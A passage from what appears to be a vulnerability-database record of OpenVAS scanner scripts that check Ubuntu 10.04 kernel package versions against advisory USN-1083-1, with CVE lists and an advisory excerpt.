ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"firewire-core-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"firewire-core-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"firewire-core-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"floppy-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"floppy-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"floppy-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-core-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-core-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-core-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-secondary-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-secondary-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-secondary-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"input-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"input-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"input-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"irda-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"irda-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"irda-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kernel-image-2.6.35-25-generic-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kernel-image-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kernel-image-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"md-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"md-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"md-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"message-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"message-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"message-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mouse-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mouse-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mouse-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nfs-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nfs-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nfs-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-pcmcia-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-pcmcia-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-pcmcia-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-shared-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-shared-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-shared-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-usb-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-usb-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-usb-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"parport-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"parport-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"parport-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pata-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pata-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pata-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-storage-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-storage-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-storage-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"plip-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"plip-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"plip-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ppp-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ppp-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ppp-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"sata-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"sata-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"sata-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"scsi-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"scsi-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"scsi-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"serial-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"serial-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"serial-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"squashfs-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"squashfs-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"squashfs-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"storage-core-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"storage-core-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"storage-core-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"usb-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"usb-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"usb-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"virtio-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"virtio-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"virtio-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"vlan-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"vlan-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"vlan-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:39:42", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1083-1", "cvss3": {}, "published": "2011-03-07T00:00:00", "type": "openvas", "title": "Ubuntu Update for linux-lts-backport-maverick vulnerabilities USN-1083-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-2942", "CVE-2010-3904", "CVE-2010-3078", "CVE-2010-2066", "CVE-2010-3297", "CVE-2010-2248", "CVE-2010-2226", "CVE-2010-4165", "CVE-2010-2960", "CVE-2010-4072", "CVE-2010-2955", "CVE-2010-2946", "CVE-2009-4895", "CVE-2010-3437", "CVE-2010-2521", "CVE-2010-2943", "CVE-2010-0435", "CVE-2010-3477", "CVE-2010-4169", "CVE-2010-3310", "CVE-2010-2963", "CVE-2010-2524", "CVE-2010-3296", "CVE-2010-2478", "CVE-2010-3850", "CVE-2010-3015", "CVE-2010-2495", "CVE-2010-3442", "CVE-2010-3705", "CVE-2010-3848", "CVE-2010-2954", "CVE-2010-4249", "CVE-2010-3858", "CVE-2010-3067", "CVE-2010-2537", "CVE-2010-3084", "CVE-2010-2798", "CVE-2010-2962", "CVE-2010-3080", "CVE-2010-3432", "CVE-2010-3298", "CVE-2010-3849", "CVE-2010-3079", "CVE-2010-2538", "CVE-2010-3861", "CVE-2010-3301"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310840605", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310840605", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1083_1.nasl 14132 2019-03-13 09:25:59Z cfischer $\n#\n# Ubuntu Update for linux-lts-backport-maverick vulnerabilities USN-1083-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-1083-1/\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.840605\");\n script_version(\"$Revision: 14132 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 10:25:59 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-03-07 06:45:55 +0100 (Mon, 07 Mar 2011)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"USN\", value:\"1083-1\");\n script_cve_id(\"CVE-2009-4895\", \"CVE-2010-0435\", \"CVE-2010-2066\", \"CVE-2010-2226\", \"CVE-2010-2248\", \"CVE-2010-2478\", \"CVE-2010-2495\", \"CVE-2010-2521\", \"CVE-2010-2524\", \"CVE-2010-2537\", \"CVE-2010-2538\", \"CVE-2010-2798\", \"CVE-2010-2942\", \"CVE-2010-2943\", \"CVE-2010-2946\", \"CVE-2010-2954\", \"CVE-2010-2955\", \"CVE-2010-2960\", \"CVE-2010-2962\", \"CVE-2010-2963\", \"CVE-2010-3015\", \"CVE-2010-3067\", \"CVE-2010-3078\", \"CVE-2010-3079\", \"CVE-2010-3080\", \"CVE-2010-3084\", \"CVE-2010-3296\", \"CVE-2010-3297\", \"CVE-2010-3298\", \"CVE-2010-3301\", \"CVE-2010-3310\", \"CVE-2010-3432\", \"CVE-2010-3437\", \"CVE-2010-3442\", \"CVE-2010-3477\", \"CVE-2010-3705\", \"CVE-2010-3848\", \"CVE-2010-3849\", \"CVE-2010-3850\", \"CVE-2010-3858\", \"CVE-2010-3861\", \"CVE-2010-3904\", \"CVE-2010-4072\", \"CVE-2010-4165\", \"CVE-2010-4169\", \"CVE-2010-4249\");\n script_name(\"Ubuntu Update for linux-lts-backport-maverick vulnerabilities USN-1083-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU10\\.04 LTS\");\n script_tag(name:\"summary\", value:\"Ubuntu Update for Linux kernel vulnerabilities USN-1083-1\");\n script_tag(name:\"affected\", value:\"linux-lts-backport-maverick vulnerabilities on Ubuntu 10.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"Al Viro discovered a race condition in the TTY driver. A local attacker\n could exploit this to crash the system, leading to a denial of service.\n (CVE-2009-4895)\n\n Gleb Napatov discovered that KVM did not correctly check certain privileged\n operations. A local attacker with access to a guest kernel could exploit\n this to crash the host system, leading to a denial of service.\n (CVE-2010-0435)\n\n Dan Rosenberg discovered that the MOVE_EXT ext4 ioctl did not correctly\n check file permissions. A local attacker could overwrite append-only files,\n leading to potential data loss. (CVE-2010-2066)\n\n Dan Rosenberg discovered that the swapexit xfs ioctl did not correctly\n check file permissions. A local attacker could exploit this to read from\n write-only files, leading to a loss of privacy. (CVE-2010-2226)\n\n Suresh Jayaraman discovered that CIFS did not correctly validate certain\n response packats. A remote attacker could send specially crafted traffic\n that would crash the system, leading to a denial of service.\n (CVE-2010-2248)\n\n Ben Hutchings discovered that the ethtool interface did not correctly check\n certain sizes. A local attacker could perform malicious ioctl calls that\n could crash the system, leading to a denial of service. (CVE-2010-2478,\n CVE-2010-3084)\n\n James Chapman discovered that L2TP did not correctly evaluate checksum\n capabilities. If an attacker could make malicious routing changes, they\n could crash the system, leading to a denial of service. (CVE-2010-2495)\n\n Neil Brown discovered that NFSv4 did not correctly check certain write\n requests. A remote attacker could send specially crafted traffic that could\n crash the system or possibly gain root privileges. (CVE-2010-2521)\n\n David Howells discovered that DNS resolution in CIFS could be spoofed. A\n local attacker could exploit this to control DNS replies, leading to a loss\n of privacy and possible privilege escalation. (CVE-2010-2524)\n\n Dan Rosenberg discovered that the btrfs filesystem did not correctly\n validate permissions when using the clone function. A local attacker could\n overwrite the contents of file handles that were opened for append-only, or\n potentially read arbitrary contents, leading to a loss of privacy.\n (CVE-2010-2537, CVE-2010-2538)\n\n Bob Peterson discovered that GFS2 rename operations did not correctly\n validate certain sizes. A local attacker could exploit this to crash the\n system, leading to a denial of service. (CVE-2010-2798)\n\n Eric Dumazet discovered that many network functions could leak kernel stack\n cont ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.35-25-generic-pae\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.35-25-generic\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.35-25-virtual\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.35-25-generic-pae\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.35-25-generic\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.35-25-virtual\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.35-25\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"block-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"block-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n 